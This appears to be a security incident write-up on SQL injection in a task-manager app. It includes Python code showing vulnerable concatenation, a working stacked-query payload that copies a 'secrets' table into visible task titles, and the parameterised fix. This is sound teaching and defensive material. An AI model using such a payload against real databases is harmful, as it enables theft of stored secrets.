A critical security incident has been identified in the task-manager application. Analysis shows that the task title supplied by the user is concatenated directly into SQL INSERT/UPDATE statements without escaping or parameterisation. Because the database layer executes several statements per call, an attacker can terminate the intended statement and append statements of their own (a stacked-query attack). The application builds statements of the form INSERT INTO tasks (done, title) VALUES (false, '[USER_INPUT]'), with [USER_INPUT] spliced into the SQL text rather than bound as a parameter.
The resolution requires a demonstration payload showing how an attacker can extract data from the 'secrets' table: input that closes the string literal and the original INSERT, then appends SQL that copies rows from 'secrets' into task titles, where they become visible through the normal task list. Note that even where the driver refuses stacked queries, the unescaped quote still breaks the statement, so the underlying fix is to bind the title as a query parameter instead of concatenating it.
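The following is an added example, not the task-manager's own code. It reproduces the vulnerable concatenation pattern quoted above against an in-memory SQLite database, runs the demonstration payload that copies 'secrets' rows into task titles, and shows the parameterised replacement. Assumptions: the 'secrets' table has a text column named `value` (the page does not name its columns), the sample secret is constructed, and multi-statement execution is modelled with sqlite3's executescript(), since the real application's driver is not identified.

```python
"""Vulnerable vs. parameterised task insertion (added example, sqlite3).

Assumptions (not from the page): an in-memory SQLite database, a
secrets(value TEXT) table, and executescript() standing in for a driver
that runs several statements per call.
"""
import sqlite3


def setup() -> sqlite3.Connection:
    # Constructed sample schema and data: one secret to exfiltrate, no tasks yet.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE tasks (id INTEGER PRIMARY KEY, done BOOLEAN, title TEXT);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, value TEXT);
        INSERT INTO secrets (value) VALUES ('db-password=hunter2');
        """
    )
    return conn


def add_task_vulnerable(conn: sqlite3.Connection, title: str) -> None:
    # The pattern quoted on the page: user input spliced into the SQL text.
    sql = f"INSERT INTO tasks (done, title) VALUES (false, '{title}')"
    conn.executescript(sql)  # runs every statement in the string


def add_task_safe(conn: sqlite3.Connection, title: str) -> None:
    # Placeholder binding: the title travels as data, never as SQL text.
    conn.execute("INSERT INTO tasks (done, title) VALUES (?, ?)", (False, title))


def list_titles(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT title FROM tasks ORDER BY id")]


# Demonstration payload matching the page's description: close the string
# literal and the INSERT, append a statement that copies secrets into visible
# task titles, then comment out the original closing quote and parenthesis.
PAYLOAD = "x'); INSERT INTO tasks (done, title) SELECT false, value FROM secrets; --"


def demo_vulnerable() -> list:
    # Stacked query runs: the secret appears as an ordinary task title.
    conn = setup()
    add_task_vulnerable(conn, PAYLOAD)
    return list_titles(conn)  # ['x', 'db-password=hunter2']


def demo_safe() -> list:
    # Same payload through a bound parameter: stored verbatim as a title,
    # and no second statement is executed.
    conn = setup()
    add_task_safe(conn, PAYLOAD)
    return list_titles(conn)


def stacked_query_refused_by_execute() -> bool:
    # Caveat: sqlite3's execute() refuses multi-statement strings, so on this
    # driver the stacked part fails. The concatenation is still broken (the
    # quote alters the statement); only parameter binding fixes the root cause.
    conn = setup()
    sql = f"INSERT INTO tasks (done, title) VALUES (false, '{PAYLOAD}')"
    try:
        conn.execute(sql)
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        # Raised as Warning on older CPython, ProgrammingError on newer ones.
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("safe      :", demo_safe())
    print("execute() refuses stacked query:", stacked_query_refused_by_execute())
```

Whether the stacked INSERT actually runs depends on the database driver in use; the vulnerable path above models a driver that executes every statement it is handed, which is what the incident description states for the task manager. The parameterised form is the correct fix either way.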